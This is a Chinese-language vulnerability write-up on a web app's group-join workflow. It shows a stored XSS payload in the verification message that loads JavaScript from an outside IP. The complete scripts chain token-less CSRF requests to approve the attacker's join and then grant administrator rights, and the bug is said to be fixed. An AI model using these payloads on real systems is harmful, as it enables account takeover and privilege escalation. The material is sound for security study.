内容简介:拿到目标后简单看了下,是一个类似员工管理的东西,用户可以创建group,其他用户可以搜索这个group然后申请加入每个账号都可以注册组织,然后让别人加入,加入的用户有创建者、管理员、默认成员3个角色,管理员拥有的权限就比较大了,可以查看通讯录、添加成员、删除成员等等走了一遍流程,注册了两个账号,一个是reber,一个是yxk
0x00 简单查看
拿到目标后简单看了下,是一个类似员工管理的东西,用户可以创建group,其他用户可以搜索这个group然后申请加入
每个账号都可以注册组织,然后让别人加入,加入的用户有创建者、管理员、默认成员3个角色,管理员拥有的权限就比较大了,可以查看通讯录、添加成员、删除成员等等
0x01 申请加入组织流程分析
走了一遍流程,注册了两个账号,一个是reber,一个是yxk
在加入某组织时会让填验证信息,组织收到申请后同意然后把用户添加到某个分组然后确定
流程大概分4步,用户申请加入group、管理员点击同意、管理员关联用户到分组或成员、确定同意用户的申请
-
用户reber搜索组织,然后提交验证消息
-
用户yxk在消息列表同意reber的申请
-
yxk给reber分组,点击下一步
-
最后一步写入备注信息,点击同意按钮最终同意用户加入
0x02 请求链接分析
经过对上面流程的抓包分析测试,涉及到的有用请求有3个:管理员点击同意链接时的请求、关联到分组或成员的请求、确定同意的请求
- 用户申请加入某group时发送的数据包如下:
API:/a/cms/org/applyorg POST:verification=11111&orgId=247173
- group管理员同意用户申请时链接如下:
API:/a/cms/apply/handle-accept?id=6de027c0-9a4f-490e-a5e2-d1c76cd34a70&oid=247178&name=1760048****
这里链接里有一个id,经过抓包发现可以通过/a/cms/apply/applymsg这个接口直接得到同意申请时的链接
- 将申请用户关联到分组或成员涉及到如下数据包:
API:/a/cms/apply/do.handle POST:ID=80b49e8f-4e8c-450f-8bf4-eb809271e779&OID=247178&GID=608863&MID=0&Agree=true&Reason=111
可以看到,上面的请求链接中都没有token,存在CSRF,就猜想能不能构造上述请求从而通过XSS和CSRF来做一些事情
0x03 构造直接添加用户到group的js
由于cookie设置了httponly,不能获取到完整的cookie,所以这里尝试写js代码,实现将用户直接加入group的功能
看了上面的请求包分析后发现,如果要构造数据包实现我们的想法的话需要有:ID、OID、GID这3个id
分析后发现在/a/cms/apply/applymsg请求的返回包中有同意的链接,链接中有ID
分析后发现在/a/cms/group/treeNode请求的返回包中有OID和GID
于是用于XSS的1.js内容构造如下:
//因为这里要把ajax的返回值return到函数中,需要是同步请求,所以async要设为false function get_agree_url(){//得到管理员同意用户申请的链接 var agree_url; var href; $.ajax({ type: 'get', url: '/a/cms/apply/applymsg', async: false, success: function(data){ $(data).find('#accept').each(function(index,element){ href = $(this).attr('href'); if (/id=.*?name=1760048****/.test(href)){ agree_url = href; } }); } }); return agree_url; } function get_oid_gid(){//得到oid和gid var oid; $.ajax({ type: 'post', url: '/a/cms/group/treeNode', dataType: 'json', async: false, data: 'parentId=0', success: function(data){ oid = data[0]['dataObject']['orgId']; gid = data[0]['dataObject']['topGroupId']; } }); return { 'oid':oid, 'gid':gid }; } function attack(){ var agree_url = get_agree_url(); var id = /id=(.*?)&/.exec(agree_url)[1]; var oid_gid = get_oid_gid(); var oid = oid_gid['oid']; var gid = oid_gid['gid']; $.get(agree_url);//同意用户加入group var step2_url = '/a/cms/apply/handle-accept2?ID='+id+'&OID='+oid+'&Name=176004****'+'&GID='+gid+'&MID=0'; $.get(step2_url);//关联到分组或成员 $.post('/a/cms/apply/do.handle',{ID:id,OID:oid,GID:gid,MID:0,Agree:true,Reason:'111'});//最终确认同意,设置备注 } attack();
0x04 进行XSS攻击添加用户
用户reber尝试加入yxk的组织并提交恶意代码: test<script src=//114.115.123.123/wyb/1.js></script>
当用户yxk浏览用户申请列表页面时触发XSS
回到reber用户,可以看到已经加入了yxk的组织,可以进行一些操作了
0x05 更进一步,添加为管理员
刚开始分析发现通过上面的过程先添加用户,然后再添加用户为管理员,比较麻烦
后续发现其实不用这么麻烦,直接用另外一个接口发送ajax请求就能直接添加管理员用户
添加管理员的2.js如下:
function get_gid(){ $.ajax({ type: 'post', url: '/a/cms/group/treeNode', dataType: 'json', async: false, data: 'parentId=0', success: function(data){ gid = data[0]['dataObject']['topGroupId']; } }); return gid; } var gid = get_gid(); $.post('/a/cms/member/do.save',{memberId: 0,userId: '',mobile: '176004****',name: 'aaa',pinyin: 'aaa',groupId: 608863,group: '默认分组',roleId: 2,duty: '',sex: 0,sort: '10000','TEL;CELL': '','TEL;WORK': '',EMAIL: ''});
提交验证信息为: test<script src=//114.115.123.123/wyb/2.js></script>
当yxk访问请求的list页面时即可直接添加新用户aaa到group并且是管理员账户:
好了,打完收工!
PS:漏洞已提交,并早在3个月前修复
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。